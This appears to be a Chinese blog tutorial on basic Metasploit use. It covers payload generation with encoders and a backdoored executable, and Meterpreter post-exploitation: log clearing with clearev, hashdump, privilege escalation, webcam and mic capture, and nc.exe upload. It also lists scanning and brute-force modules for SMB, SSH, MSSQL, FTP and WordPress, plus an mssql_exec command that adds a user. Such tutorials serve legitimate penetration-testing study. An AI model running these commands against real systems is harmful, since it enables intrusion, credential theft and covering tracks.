msf基本使用教程

模块

exploit

  • active 找服务器开放的服务的漏洞
  • passive 钓鱼 让受害者有漏洞的软件来主动访问我

payload

▪ use payload/windows/shell_bind_tcp
▪ generate (坏字符)
▪ msf 自动选择编码绕过坏字符
	– generate -b '\x00'
	– generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b'
	– generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b
	\xFF\x0a\x0b\x01\xcc\6e\x1e\x2e\x26' 
▪ 手动指定编码
	– show encoders / generate -e x86/nonalpha
▪ generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/
share/windows-binaries/radmin.exe -f /root/1.exe (放到windows上执行 ,然后 本地nc ip port 拿到shell)
▪ NOP:no-operation / Next Operation(无任何操作)
	– EIP 最终会导致shellcode的执行
	– generate -s 14  

Meterpreter 高级payload

特性:运行在windows ?
演示环境是:
	ms08_067 (exploit) 
	payload meterpreter_reverse_tcp
基本命令
▪ help̵ background 退出shell
▪ run / bgrun  xxxxx 运行某些命令
▪ cd ls  cat pwd dir mkdir mv rm rmdir edit
▪ lpwd lcd  打开本机的目录
▪ clearev 清理日志
▪ 上传下载
	download ̵ – 
	upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
▪ execute -f cmd.exe -i –H  执行命令
▪ getuid getsystem getprivs getproxy getpid
▪ migrate pid 注入到其它的进程
▪ hashdump  下载字典文件到本地
	run post/windows/gather/hashdump 同上
▪ sysinfo ps kill migrate reboot shutdown shell
▪ show_mount 挂载    search -f autoexec.bat 搜索文件
▪ arp netstat ipconfig ifconfig route
▪ idletime 是否长时间离线   resource -r r.txt 类似于msf的资源文件
▪ record_mic    webcam_list    webcam_snap -i 1 -v false

加载python

▪ load python 无须python解释器 直接执行python代码
	– Help
	– python_execute "print ('asdasdas')"
	– python_execute "import os; cd = os.getcwd()" -r cd
	– python_import -f find.py   执行python文件

信息收集

nmap扫描

  • – db_nmap -sV 192.168.1.0/24

Auxiliary 模块扫描

– RHOSTS <> RHOST 
	▪ 192.168.1.20-192.168.1.30̵ 
	▪ 192.168.1.0/24,192.168.11.0/24
	▪ file:/root/h.txt
– search arp 
	▪ use auxiliary/scanner/discovery/arp_sweep  和nmap扫描结果类似
	▪ set INTERFACE RHOSTS SHOST SMAC THREADS    run
– search portscan
	▪ use auxiliary/scanner/portscan/syn
	▪ set INTERFACE  PORTS RHOSTS THREADS     run

udp扫描

nmap -sU 
扫描开放的udp端口
	– use auxiliary/scanner/discovery/udp_sweep
	– use auxiliary/scanner/discovery/udp_probe

nmap IPID Idle

扫描按顺序递增的很空闲的主机
– 查找 ipidseq 主机
	▪ use auxiliary/scanner/ip/ipidseq
	▪ set RHOSTS 192.168.1.100-192.168.1.200
– nmap -PN -sI 1.1.1.2 1.1.1.3 进行欺骗

密码嗅探

只能扫描本机的输入记录 感觉没啥用
– use auxiliary/sniffer/psnuffle
– 支持从pcap文件中提取密码
– 功能类似 dsniff
– 目前只支持 ftp pop3 http-get 协议

snmp扫描

以metasploit的虚拟机玩

– vi /etc/default/snmpd # 修改侦听端口 0.0.0.0
– linux的
	▪ use auxiliary/scanner/snmp/snmp_login  登陆
	▪ use auxiliary/scanner/snmp/snmp_enum  扫描信息
– windows
	▪ use auxiliary/scanner/snmp/snmp_enumusers 枚举用户
	▪ use auxiliary/scanner/snmp/snmp_enumshares  

smb扫描


– smb版本扫描
	▪ use auxiliary/scanner/smb/smb_version
– 扫描 命名管道 判断服务类型
	▪ use auxiliary/scanner/smb/pipe_auditor
– 扫描 通过smb管道可以访问的 RCERPC 服务
	▪ use auxiliary/scanner/smb/pipe_dcerpc_auditor
– smb共享枚举
	▪ use auxiliary/scanner/smb/smb_enumshares
– smb用户枚举
	▪ use auxiliary/scanner/smb/smb_enumusers
– SID枚举
	▪ use auxiliary/scanner/smb/smb_lookupsid

ssh扫描

ssh 版本扫描
	▪ use auxiliary/scanner/ssh/ssh_version
	▪ 1.0存在漏洞
– ssh 密码爆破
	▪ use auxiliary/scanner/ssh/ssh_login
	▪ 字典文件的位置 framework/data/wordlists
	▪ 可以用美杜莎爆破
– ssh 公钥登陆
	▪ use auxiliary/scanner/ssh/ssh_login_pubkey
	▪ set KEY_FILE id_rsa

mssql 扫描


– TCP 1433  UDP 1434
	▪ use auxiliary/scanner/mssql/mssql_ping
	▪ 扫描微软的 mssql 使用的动态端口(非1433)
– 密码爆破
	▪ use auxiliary/scanner/mssql/mssql_login
– 远程代码执行
	▪ use auxiliary/admin/mssql/mssql_exec
	▪ set CMD   net user user pass /ADD # 加用户

ftp 扫描

ftp 版本扫描 21
	▪ use auxiliary/scanner/ftp/ftp_version
	▪ use auxiliary/scanner/ftp/anonymous
	▪ use auxiliary/scanner/ftp/ftp_login

弱点扫描

RDP 远程桌面漏洞

– 只是检查模块检查,不会造成dos攻击
	▪ use auxiliary/scanner/rdp/ms12_020_check
	▪ 存在漏洞后 search ms12_020

VMWare ESXi 密码爆破

▪ use auxiliary/scanner/vmware/vmauthd_login
▪ use auxiliary/scanner/vmware/vmware_enum_vms

http 弱点扫描

– 过期证书
	▪ use auxiliary/scanner/http/cert
– 显示目录和证书
	▪ use auxiliary/scanner/http/dir_listing
	▪ use auxiliary/scanner/http/files_dir
– WebDAV Unicode 编码身份验证绕过
	▪ use auxiliary/scanner/http/dir_webdav_unicode_bypass
– Tomcat 管理登陆页面
	▪ use auxiliary/scanner/http/tomcat_mgr_login
– 基于 http 方法的身份绕过
	▪ use auxiliary/scanner/http/verb_auth_bypass
– Wordpress 密码爆破
	▪ use auxiliary/scanner/http/wordpress_login_enum
	▪ set URI /wordpress/wp-login.php

WMAP WEB 应用扫描器

– 根据sqlmap设计
– load wmap
– 使用
	▪ wmap_sites -a http://1.1.1.1  # 指定站点
	▪ wmap_targets -t http://1.1.1.1/mutillidae/index.php # 指定目标
	▪ wmap_run -t # 展示模块
	▪ wmap_run -e # 直接执行
	▪ wmap_vulns -l  # 列出站点
	▪ vulns
  • 5
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值